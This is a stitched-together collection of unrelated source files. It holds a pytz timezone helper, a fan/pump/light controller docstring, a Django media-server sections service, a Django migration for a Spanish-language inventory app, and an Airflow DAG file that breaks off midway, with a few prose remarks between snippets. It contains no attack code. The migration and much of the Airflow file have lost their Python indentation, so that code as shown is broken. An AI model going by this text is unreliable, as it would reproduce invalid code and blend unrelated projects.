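print(struct.calcsize(fmt))  # 17 bytes in total
```

That is why `test_constaddr_C_int`, which adds 42 at ZR+9, modifies the `4` (the fourth field) and leaves the surrounding fields untouched.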

# --- joey/utils/timezone.py (pinecrew/joey, MIT) ---
from datetime import datetime as dt
import pytz


def now():
    return dt.utcnow().replace(tzinfo=pytz.utc)
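A note on the helper above: the `replace(tzinfo=pytz.utc)` call turns the naive `utcnow()` result into an aware datetime. On Python 3 the same effect is available without pytz; a minimal stdlib sketch (a hypothetical alternative, not part of this module):

```python
from datetime import datetime, timezone


def now_stdlib():
    # Aware UTC timestamp, equivalent to utcnow().replace(tzinfo=pytz.utc).
    return datetime.now(timezone.utc)


t = now_stdlib()
print(t.tzinfo is not None)           # True
print(t.utcoffset().total_seconds())  # 0.0
```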

# --- tasks/learn.py (w0w/miniPFC, MIT) ---
'''
decide to turn on/off fan
decide to turn on/off pump
decide to turn on/off light
'''

# --- tridentstream/services/sections/handler.py (tridentstream/mediaserver, MIT) ---
import logging
from django.conf.urls import url
from unplugged import DefaultPermission, RelatedPluginField, Schema, command, fields

from ...bases.listing.handler import BaseListingService
from ...bases.listing.models import ListingItem
from ...bases.listing.schema import BaseSchema, ListingSchema
from ...plugins import InputPlugin, InputPluginManager
from .views import SectionsListView

logger = logging.getLogger(__name__)


class SectionInputSchema(Schema):
    path = fields.String(default="")
    preference = fields.Integer(default=10)
    input = RelatedPluginField(plugin_type=InputPlugin, required=True)


class SectionSchema(ListingSchema):
    inputs = fields.Nested(SectionInputSchema, many=True, default=list)


class SectionServiceSchema(BaseSchema):
    sections = fields.Nested(SectionSchema, many=True, default=list)


class SectionsService(BaseListingService):
    plugin_name = "sections"
    config_schema = SectionServiceSchema
    default_permission = DefaultPermission.ALLOW

    simpleadmin_templates = [
        {
            "template": {
                "display_name": {"simpleAdminMethod": "userInput", "required": True},
                "inputs": {
                    "simpleAdminMethod": "userInput",
                    "hideFields": ["preference"],
                },
                "name": {"simpleAdminMethod": "slugify", "source": "display_name"},
                "histories": [
                    {
                        "simpleAdminMethod": "lookupPlugin",
                        "plugin_type": "history",
                        "name": "history",
                    }
                ],
                "primary_metadata_plugin": {
                    "simpleAdminMethod": "injectablePlugin",
                    "plugin_type": "metadatahandler",
                    "required": False,
                    "traits": ["primary_metadata", "metadata_movie"],
                },
                "rebuild_automatically": True,
                "levels": [
                    {
                        "indexer": {
                            "simpleAdminMethod": "createPlugin",
                            "plugin_type": "indexer",
                            "plugin_name": "whoosh",
                            "name": "index_automanaged_%(name)s",
                            "config": {"path": "index_automanaged_%(name)s"},
                        },
                        "depth": 0,
                        "content_type": "movies",
                        "default_ordering": "-metadata_firstseen__datetime,-datetime",
                        "listing_depth": 0,
                        "tags": [
                            {
                                "simpleAdminMethod": "lookupPlugin",
                                "plugin_type": "tag",
                                "name": "tag",
                            }
                        ],
                        "metadata_handlers": [
                            {
                                "simpleAdminMethod": "injectedPlugin",
                                "id": "primary_metadata_plugin",
                            },
                            {
                                "simpleAdminMethod": "lookupPlugin",
                                "plugin_type": "metadatahandler",
                                "name": "historymetadata",
                            },
                            {
                                "simpleAdminMethod": "lookupPlugin",
                                "plugin_type": "metadatahandler",
                                "name": "iteminfo",
                            },
                            {
                                "simpleAdminMethod": "lookupPlugin",
                                "plugin_type": "metadatahandler",
                                "name": "firstseen",
                            },
                            {
                                "simpleAdminMethod": "lookupPlugin",
                                "plugin_type": "metadatahandler",
                                "name": "name",
                            },
                            {
                                "simpleAdminMethod": "lookupPlugin",
                                "plugin_type": "metadatahandler",
                                "name": "tag",
                            },
                        ],
                    }
                ],
            },
            "description": "A folder with movies in it",
            "id": "movies",
            "update_method": "modify_key",
            "modify_key": "sections",
            "display_name": "Movies",
        },
        {
            "template": {
                "display_name": {"simpleAdminMethod": "userInput", "required": True},
                "inputs": {
                    "simpleAdminMethod": "userInput",
                    "hideFields": ["preference"],
                },
                "name": {"simpleAdminMethod": "slugify", "source": "display_name"},
                "histories": [
                    {
                        "simpleAdminMethod": "lookupPlugin",
                        "plugin_type": "history",
                        "name": "history",
                    }
                ],
                "primary_metadata_plugin": {
                    "simpleAdminMethod": "injectablePlugin",
                    "plugin_type": "metadatahandler",
                    "traits": ["primary_metadata", "metadata_tv"],
                },
                "rebuild_automatically": True,
                "levels": [
                    {
                        "indexer": {
                            "simpleAdminMethod": "createPlugin",
                            "plugin_type": "indexer",
                            "plugin_name": "whoosh",
                            "name": "index_automanaged_%(name)s",
                            "config": {"path": "index_automanaged_%(name)s"},
                        },
                        "depth": 0,
                        "content_type": "tvshows",
                        "default_ordering": "-datetime",
                        "listing_depth": 0,
                        "tags": [
                            {
                                "simpleAdminMethod": "lookupPlugin",
                                "plugin_type": "tag",
                                "name": "tag",
                            }
                        ],
                        "metadata_handlers": [
                            {
                                "simpleAdminMethod": "injectedPlugin",
                                "id": "primary_metadata_plugin",
                            },
                            {
                                "simpleAdminMethod": "lookupPlugin",
                                "plugin_type": "metadatahandler",
                                "name": "tag",
                            },
                            {
                                "simpleAdminMethod": "lookupPlugin",
                                "plugin_type": "metadatahandler",
                                "name": "firstseen",
                            },
                            {
                                "simpleAdminMethod": "lookupPlugin",
                                "plugin_type": "metadatahandler",
                                "name": "name",
                            },
                            {
                                "simpleAdminMethod": "lookupPlugin",
                                "plugin_type": "metadatahandler",
                                "name": "tag",
                            },
                        ],
                    },
                    {
                        "indexer": None,
                        "depth": 1,
                        "content_type": "episodes",
                        "default_ordering": "-metadata_iteminfo__season,-metadata_iteminfo__episode",
                        "listing_depth": 0,
                        "metadata_handlers": [
                            {
                                "simpleAdminMethod": "lookupPlugin",
                                "plugin_type": "metadatahandler",
                                "name": "historymetadata",
                            },
                            {
                                "simpleAdminMethod": "lookupPlugin",
                                "plugin_type": "metadatahandler",
                                "name": "iteminfo",
                            },
                            {
                                "simpleAdminMethod": "lookupPlugin",
                                "plugin_type": "metadatahandler",
                                "name": "firstseen",
                            },
                            {
                                "simpleAdminMethod": "lookupPlugin",
                                "plugin_type": "metadatahandler",
                                "name": "name",
                            },
                        ],
                    },
                ],
            },
            "description": "Folder with TV shows.\n\n"
            "The folder must have the organization /tv/show/episode.\n"
            "An example could be /TVFolder/A.Good.Show/A.Good.Show.S03E03",
            "id": "tv-episode",
            "update_method": "modify_key",
            "modify_key": "sections",
            "display_name": "TV /tv/show/episode",
        },
        {
            "template": {
                "display_name": {"simpleAdminMethod": "userInput", "required": True},
                "inputs": {
                    "simpleAdminMethod": "userInput",
                    "hideFields": ["preference"],
                },
                "name": {"simpleAdminMethod": "slugify", "source": "display_name"},
                "histories": [
                    {
                        "simpleAdminMethod": "lookupPlugin",
                        "plugin_type": "history",
                        "name": "history",
                    }
                ],
                "primary_metadata_plugin": {
                    "simpleAdminMethod": "injectablePlugin",
                    "plugin_type": "metadatahandler",
                    "traits": ["primary_metadata", "metadata_tv"],
                },
                "rebuild_automatically": True,
                "levels": [
                    {
                        "indexer": {
                            "simpleAdminMethod": "createPlugin",
                            "plugin_type": "indexer",
                            "plugin_name": "whoosh",
                            "name": "index_automanaged_%(name)s",
                            "config": {"path": "index_automanaged_%(name)s"},
                        },
                        "depth": 0,
                        "content_type": "tvshows",
                        "default_ordering": "-datetime",
                        "listing_depth": 0,
                        "tags": [
                            {
                                "simpleAdminMethod": "lookupPlugin",
                                "plugin_type": "tag",
                                "name": "tag",
                            }
                        ],
                        "metadata_handlers": [
                            {
                                "simpleAdminMethod": "injectedPlugin",
                                "id": "primary_metadata_plugin",
                            },
                            {
                                "simpleAdminMethod": "lookupPlugin",
                                "plugin_type": "metadatahandler",
                                "name": "tag",
                            },
                            {
                                "simpleAdminMethod": "lookupPlugin",
                                "plugin_type": "metadatahandler",
                                "name": "firstseen",
                            },
                            {
                                "simpleAdminMethod": "lookupPlugin",
                                "plugin_type": "metadatahandler",
                                "name": "name",
                            },
                        ],
                    },
                    {
                        "indexer": None,
                        "depth": 1,
                        "content_type": "seasons",
                        "default_ordering": "-metadata_iteminfo__season",
                        "listing_depth": 0,
                        "metadata_handlers": [
                            {
                                "simpleAdminMethod": "lookupPlugin",
                                "plugin_type": "metadatahandler",
                                "name": "iteminfo",
                            }
                        ],
                    },
                    {
                        "indexer": None,
                        "depth": 2,
                        "content_type": "episodes",
                        "default_ordering": "-metadata_iteminfo__season,-metadata_iteminfo__episode",
                        "listing_depth": 0,
                        "metadata_handlers": [
                            {
                                "simpleAdminMethod": "lookupPlugin",
                                "plugin_type": "metadatahandler",
                                "name": "historymetadata",
                            },
                            {
                                "simpleAdminMethod": "lookupPlugin",
                                "plugin_type": "metadatahandler",
                                "name": "iteminfo",
                            },
                            {
                                "simpleAdminMethod": "lookupPlugin",
                                "plugin_type": "metadatahandler",
                                "name": "firstseen",
                            },
                            {
                                "simpleAdminMethod": "lookupPlugin",
                                "plugin_type": "metadatahandler",
                                "name": "name",
                            },
                        ],
                    },
                ],
            },
            "description": "Folder with TV shows.\n\n"
            "The folder must have the organization /tv/show/season/episode.\n"
            "An example could be /TVFolder/A.Good.Show/Season.03/A.Good.Show.S03E03",
            "id": "tv-season-episode",
            "update_method": "modify_key",
            "modify_key": "sections",
            "display_name": "TV /tv/show/season/episode",
        },
    ]

    def get_urls(self):
        return [
            url(
                r"^(?P<path>.*)$",
                SectionsListView.as_view(
                    service=self, listing_builder=self.listing_builder
                ),
            )
        ]

    def get_item(self, config, path):
        if not config.get("inputs"):
            return None

        plugin_path_pairs = []
        for input_config in config["inputs"]:
            input_path = input_config.get("path", "").strip("/")
            listing_path = f"{input_path}/{config['path']}"
            plugin_path_pairs.append((input_config["input"], listing_path.strip("/")))

        logger.info(f"Trying to create listing for {plugin_path_pairs!r} - path:{path}")
        item = InputPluginManager.get_item_multiple(plugin_path_pairs)

        if "/" not in path and "display_name" in config:
            item.id = config["display_name"]

        return item
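The path handling in `get_item` above normalizes slashes before handing the pairs to `InputPluginManager`; a standalone sketch of just that normalization (hypothetical helper name and inputs, illustrative only):

```python
def build_listing_path(input_path, section_path):
    # Mirrors get_item: strip slashes from the configured input path, join it
    # with the section path, and strip again so the result is always a bare
    # relative path regardless of how the input path was configured.
    input_path = (input_path or "").strip("/")
    return f"{input_path}/{section_path}".strip("/")


print(build_listing_path("/mnt/movies/", "new"))  # mnt/movies/new
print(build_listing_path("", "new"))              # new
```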

# --- inventario/migrations/0001_initial.py (exildev/pisix, MIT) ---
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-03-18 22:41
from __future__ import unicode_literals
from django.conf import settings
import django.contrib.auth.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0007_alter_validators_add_error_messages'),
]
operations = [
migrations.CreateModel(
name='ActaEntrada',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fecha', models.DateTimeField(auto_now_add=True)),
('imagen', models.ImageField(blank=True, null=True, upload_to='actas_entrada')),
('descripcion', models.TextField(max_length=500)),
],
options={
'verbose_name': 'Acta de entrada',
'verbose_name_plural': 'Actas de entradas',
},
),
migrations.CreateModel(
name='ActaRequisicion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fecha', models.DateTimeField(auto_now=True)),
('descripcion', models.TextField(max_length=500)),
],
options={
'verbose_name': 'Acta de requisici\xf3n',
'verbose_name_plural': 'Actas de requisici\xf3n',
},
),
migrations.CreateModel(
name='ActaSalida',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fecha', models.DateTimeField(auto_now=True)),
('archivo', models.FileField(blank=True, null=True, upload_to='actas_salida', verbose_name='Acta')),
('descripcion', models.TextField(max_length=500)),
],
options={
'verbose_name': 'Acta de salida',
'verbose_name_plural': 'Actas de salidas',
},
),
migrations.CreateModel(
name='Activo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('serial', models.CharField(max_length=60)),
('activado', models.BooleanField(default=True)),
('vendido', models.BooleanField(default=False)),
],
options={
'verbose_name': 'Activo Serial',
'verbose_name_plural': 'Activos Seriales',
},
),
migrations.CreateModel(
name='ActivoInsumo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('cantidad', models.IntegerField()),
('serial', models.CharField(max_length=60)),
('activado', models.BooleanField(default=True)),
('vendido', models.BooleanField(default=False)),
],
options={
'verbose_name': 'Activo no serial',
'verbose_name_plural': 'Activo no seriales',
},
),
migrations.CreateModel(
name='Articulo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=45)),
('descripcion', models.TextField(max_length=500)),
('fecha_creacion', models.DateTimeField(auto_now=True)),
('imagen', models.ImageField(blank=True, null=True, upload_to='articulos')),
('tiempo_entrega', models.IntegerField(verbose_name='Tiempo de entrega(Dias)')),
('activado', models.BooleanField(default=True)),
('precio', models.DecimalField(decimal_places=2, max_digits=19)),
],
options={
'verbose_name': 'Articulo Piscina',
'verbose_name_plural': 'Articulos Piscinas',
},
),
migrations.CreateModel(
name='ArticuloInsumo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=45)),
('descripcion', models.TextField(max_length=500)),
('activado', models.BooleanField(default=True)),
('imagen', models.ImageField(blank=True, null=True, upload_to='articulos')),
('precio', models.DecimalField(decimal_places=2, max_digits=19)),
('fecha_creacion', models.DateTimeField(auto_now=True)),
],
options={
'verbose_name': 'Articulo no serial',
'verbose_name_plural': 'Aticulos no seriales',
},
),
migrations.CreateModel(
name='Bodega',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('identi', models.CharField(max_length=45, verbose_name='Identificaci\xf3n')),
('nombre', models.CharField(max_length=45)),
('direccion', models.CharField(max_length=100)),
('telefono', models.CharField(max_length=10)),
],
),
migrations.CreateModel(
name='Central',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bodega', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Bodega')),
],
options={
'verbose_name': 'Central',
'verbose_name_plural': 'Centrales',
},
),
migrations.CreateModel(
name='Cuenta',
fields=[
('user_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to=settings.AUTH_USER_MODEL)),
('bodega', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Bodega')),
],
options={
'verbose_name': 'Cuenta',
'verbose_name_plural': 'Cuentas',
},
bases=('auth.user',),
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
migrations.CreateModel(
name='Custodio',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('identi', models.CharField(max_length=45, verbose_name='Identificaci\xf3n')),
('nombre', models.CharField(max_length=45)),
('direccion', models.CharField(max_length=100)),
('telefono', models.CharField(max_length=10)),
('correo', models.CharField(max_length=45)),
],
),
migrations.CreateModel(
name='EntradaInsumo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fecha', models.DateTimeField(auto_now_add=True)),
('imagen', models.ImageField(blank=True, null=True, upload_to='actas_entrada')),
('descripcion', models.TextField(max_length=500)),
('activos', models.ManyToManyField(to='inventario.ActivoInsumo')),
('custodio', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Custodio')),
('destino', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='destino1', to='inventario.Bodega')),
('origen', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='origen1', to='inventario.Bodega')),
],
options={
'verbose_name': 'Entrada de Insumo',
'verbose_name_plural': 'Entradas de Insimos',
},
),
migrations.CreateModel(
name='Fabricante',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=45)),
('logo', models.ImageField(blank=True, null=True, upload_to='logo')),
('fecha', models.DateField(auto_now=True)),
],
),
migrations.CreateModel(
name='LogInsumo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fecha', models.DateTimeField(auto_now_add=True)),
('cantidad', models.IntegerField()),
('activo', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.ActivoInsumo')),
('bodega', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Bodega')),
],
options={
'verbose_name': 'Log de Insumo',
'verbose_name_plural': 'Logs de insumos',
},
),
migrations.CreateModel(
name='LogPiscina',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fecha', models.DateTimeField(auto_now=True)),
('cantidad', models.IntegerField()),
('articulo', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Articulo')),
('bodega', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='inventario.Bodega')),
],
options={
'verbose_name': 'Log piscina',
'verbose_name_plural': 'Logs de piscinas',
},
),
migrations.CreateModel(
name='Proveedor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=45)),
('logo', models.ImageField(blank=True, null=True, upload_to='logo')),
('fecha', models.DateField(auto_now=True)),
],
options={
'verbose_name': 'Proveedor',
'verbose_name_plural': 'Provedores',
},
),
migrations.CreateModel(
name='RequisicionArticulo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('cantidad', models.IntegerField()),
('acta', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.ActaRequisicion')),
('articulo', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Articulo')),
],
options={
'verbose_name': 'Activo',
'verbose_name_plural': 'Activos',
},
),
migrations.CreateModel(
name='RequisicionNoSerial',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('cantidad', models.IntegerField()),
('acta', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.ActaRequisicion')),
('activo', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.ArticuloInsumo')),
],
options={
'verbose_name': 'Activo no serial',
'verbose_name_plural': 'Activos no seriales',
},
),
migrations.CreateModel(
name='SalidaInsumo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fecha', models.DateTimeField(auto_now=True)),
('archivo', models.FileField(blank=True, null=True, upload_to='actas_salida', verbose_name='Acta')),
('descripcion', models.TextField(max_length=500)),
('activos', models.ManyToManyField(to='inventario.ActivoInsumo')),
('creado_por', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Cuenta')),
('custodio', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Custodio')),
('destino', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='destino2', to='inventario.Bodega')),
('salida', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='origen2', to='inventario.Bodega')),
],
options={
'verbose_name': 'Salida de Insumo',
'verbose_name_plural': 'Salidas de Insumos',
},
),
migrations.CreateModel(
name='TipoActivo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=200)),
],
options={
'verbose_name': 'Tipo de activo',
'verbose_name_plural': 'Tipos de activos',
},
),
migrations.CreateModel(
name='TrazabilidadActivo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fecha', models.DateTimeField(auto_now_add=True)),
('mensage', models.CharField(max_length=150, verbose_name='Mensaje')),
('activo', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Activo')),
('bodega', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='inventario.Bodega')),
],
),
migrations.CreateModel(
name='TrazabilidadInsumo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fecha', models.DateTimeField(auto_now_add=True)),
('mensage', models.CharField(max_length=150, verbose_name='Mensaje')),
('activo', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.ActivoInsumo')),
('bodega', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='inventario.Bodega')),
],
),
migrations.CreateModel(
name='Compra',
fields=[
('actaentrada_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='inventario.ActaEntrada')),
('creado_por', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Cuenta')),
],
bases=('inventario.actaentrada',),
),
migrations.AddField(
model_name='articuloinsumo',
name='fabricante',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Fabricante'),
),
migrations.AddField(
model_name='articulo',
name='fabricante',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Fabricante'),
),
migrations.AddField(
model_name='activoinsumo',
name='articulo',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.ArticuloInsumo'),
),
migrations.AddField(
model_name='activoinsumo',
name='bodega',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Bodega'),
),
migrations.AddField(
model_name='activo',
name='articulo',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Articulo'),
),
migrations.AddField(
model_name='activo',
name='bodega',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Bodega'),
),
migrations.AddField(
model_name='activo',
name='tipo',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.TipoActivo'),
),
migrations.AddField(
model_name='actasalida',
name='activos',
field=models.ManyToManyField(blank=True, to='inventario.Activo'),
),
migrations.AddField(
model_name='actasalida',
name='creado_por',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Cuenta'),
),
migrations.AddField(
model_name='actasalida',
name='custodio',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Custodio'),
),
migrations.AddField(
model_name='actasalida',
name='destino',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='destino', to='inventario.Bodega'),
),
migrations.AddField(
model_name='actasalida',
name='salida',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='salida', to='inventario.Bodega'),
),
migrations.AddField(
model_name='actarequisicion',
name='bodega',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Bodega'),
),
migrations.AddField(
model_name='actarequisicion',
name='central',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Central'),
),
migrations.AddField(
model_name='actaentrada',
name='activos',
field=models.ManyToManyField(blank=True, to='inventario.Activo'),
),
migrations.AddField(
model_name='actaentrada',
name='custodio',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Custodio'),
),
migrations.AddField(
model_name='actaentrada',
name='destino',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='destino_', to='inventario.Bodega'),
),
migrations.AddField(
model_name='actaentrada',
name='origen',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='origen_', to='inventario.Bodega'),
),
]
# Source: etl_base/dags/sqlg_dag_PRD.py (buckylee2019/sqlg-airflow-2.0 @ 431b823, Apache-2.0)
# -*- coding: utf-8 -*-
# Author : Jesse Wei
# LastUpdate : 2020/10/04
# Impact : Jobs generated by SQLG
# Message : Humanity towards others, we live by sharing. Fear can hold you prisoner, only hope can set you free.
# from __future__ import print_function
import logging
import re
import pendulum
import airflow
from datetime import datetime, timedelta
from airflow.sensors.external_task import ExternalTaskSensor
from airflow.operators.python import PythonOperator, BranchPythonOperator
from airflow.operators.bash import BashOperator
from airflow.sensors.filesystem import FileSensor
from airflow.operators.dummy import DummyOperator
from airflow.models import Variable, DagModel, DagBag
from airflow import models
from acme.operators.sqlg_oracle import OracleOperatorWithTemplatedParams
from airflow.providers.oracle.operators.oracle import OracleOperator
# DB_NAME = 'DWH' # for future xDB operator
proj_start_date = pendulum.datetime(2021, 1, 1, tz="Etc/GMT-8")
tmpl_search_path = Variable.get("sql_path")
data_stage_imp_ptn = '_ODS_'
data_stage = []
std_interval = {
'@once' :1,
'@hourly' :2,
'0 5 * * *' :3,
'0 5 * * 0' :4,
'0 5 1 * *' :5,
'0 5 1 */3 *' :6,
'0 5 1 1 *' :7,
}
# Function to sync execution dates across DAGs that run at different frequencies
def sqlg_exec_date_fn(dt, context):
    var_date = Variable.get("sqlg_execution_date")
    ti = context['ti']
    dag = context['dag']
    ti_exec_date = context['execution_date']
    schedule_interval = dag.schedule_interval
    # If waiting on INIT with a standard (@-alias) frequency, use the planner's
    # sqlg_execution_date Variable (set as {{ ds }} by the planner);
    # otherwise the DAG keeps its own execution date.
    if ti.task.external_dag_id == 'D_STG_INIT' and schedule_interval[0] == '@':
        exec_date = pendulum.parse(var_date)
    else:
        exec_date = ti_exec_date
    print("sqlg_exec_date_fn::DEBUG:external_dag_id, exec_date:", ti.task.external_dag_id, exec_date)
    return exec_date
args = {
"owner": "DG_IBM2",
'start_date': proj_start_date,
'provide_context': True
}
# XSLT:loop: declaration: END}
# XSLT:loop: JOB_FLOW_NAME: START{
job_flow_name = "D_ODS_PRD_SRC"
if job_flow_name == 'I_SDM_CMN':
    data_stage = ['ODS']
else:
    data_stage = re.findall(r"_(.*?)_", "D_ODS_PRD_SRC")
D_ODS_PRD_SRC = airflow.DAG(
"D_ODS_PRD_SRC",
tags=["PRD", data_stage[0]],
schedule_interval="@daily",
dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
max_active_runs=1,
catchup=False
)
job_flow_name = "D_SDM_PRD"
if job_flow_name == 'I_SDM_CMN':
    data_stage = ['ODS']
else:
    data_stage = re.findall(r"_(.*?)_", "D_SDM_PRD")
D_SDM_PRD = airflow.DAG(
"D_SDM_PRD",
tags=["PRD", data_stage[0]],
schedule_interval="@daily",
dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
max_active_runs=1,
catchup=False
)
job_flow_name = "D_DM_PRD"
if job_flow_name == 'I_SDM_CMN':
    data_stage = ['ODS']
else:
    data_stage = re.findall(r"_(.*?)_", "D_DM_PRD")
D_DM_PRD = airflow.DAG(
"D_DM_PRD",
tags=["PRD", data_stage[0]],
schedule_interval="@daily",
dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
max_active_runs=1,
catchup=False
)
job_flow_name = "D_ODS_CUS"
if job_flow_name == 'I_SDM_CMN':
    data_stage = ['ODS']
else:
    data_stage = re.findall(r"_(.*?)_", "D_ODS_CUS")
D_ODS_CUS = airflow.DAG(
"D_ODS_CUS",
tags=["PRD", data_stage[0]],
schedule_interval="@daily",
dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
max_active_runs=1,
catchup=False
)
job_flow_name = "D_ODS_GBD"
if job_flow_name == 'I_SDM_CMN':
    data_stage = ['ODS']
else:
    data_stage = re.findall(r"_(.*?)_", "D_ODS_GBD")
D_ODS_GBD = airflow.DAG(
"D_ODS_GBD",
tags=["PRD", data_stage[0]],
schedule_interval="@daily",
dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
max_active_runs=1,
catchup=False
)
job_flow_name = "D_ODS_HRM"
if job_flow_name == 'I_SDM_CMN':
    data_stage = ['ODS']
else:
    data_stage = re.findall(r"_(.*?)_", "D_ODS_HRM")
D_ODS_HRM = airflow.DAG(
"D_ODS_HRM",
tags=["PRD", data_stage[0]],
schedule_interval="@daily",
dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
max_active_runs=1,
catchup=False
)
job_flow_name = "D_ODS_MFG"
if job_flow_name == 'I_SDM_CMN':
    data_stage = ['ODS']
else:
    data_stage = re.findall(r"_(.*?)_", "D_ODS_MFG")
D_ODS_MFG = airflow.DAG(
"D_ODS_MFG",
tags=["PRD", data_stage[0]],
schedule_interval="@daily",
dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
max_active_runs=1,
catchup=False
)
job_flow_name = "D_ODS_PRD"
if job_flow_name == 'I_SDM_CMN':
    data_stage = ['ODS']
else:
    data_stage = re.findall(r"_(.*?)_", "D_ODS_PRD")
D_ODS_PRD = airflow.DAG(
"D_ODS_PRD",
tags=["PRD", data_stage[0]],
schedule_interval="@daily",
dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
max_active_runs=1,
catchup=False
)
job_flow_name = "D_ODS_QAM"
if job_flow_name == 'I_SDM_CMN':
    data_stage = ['ODS']
else:
    data_stage = re.findall(r"_(.*?)_", "D_ODS_QAM")
D_ODS_QAM = airflow.DAG(
"D_ODS_QAM",
tags=["PRD", data_stage[0]],
schedule_interval="@daily",
dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
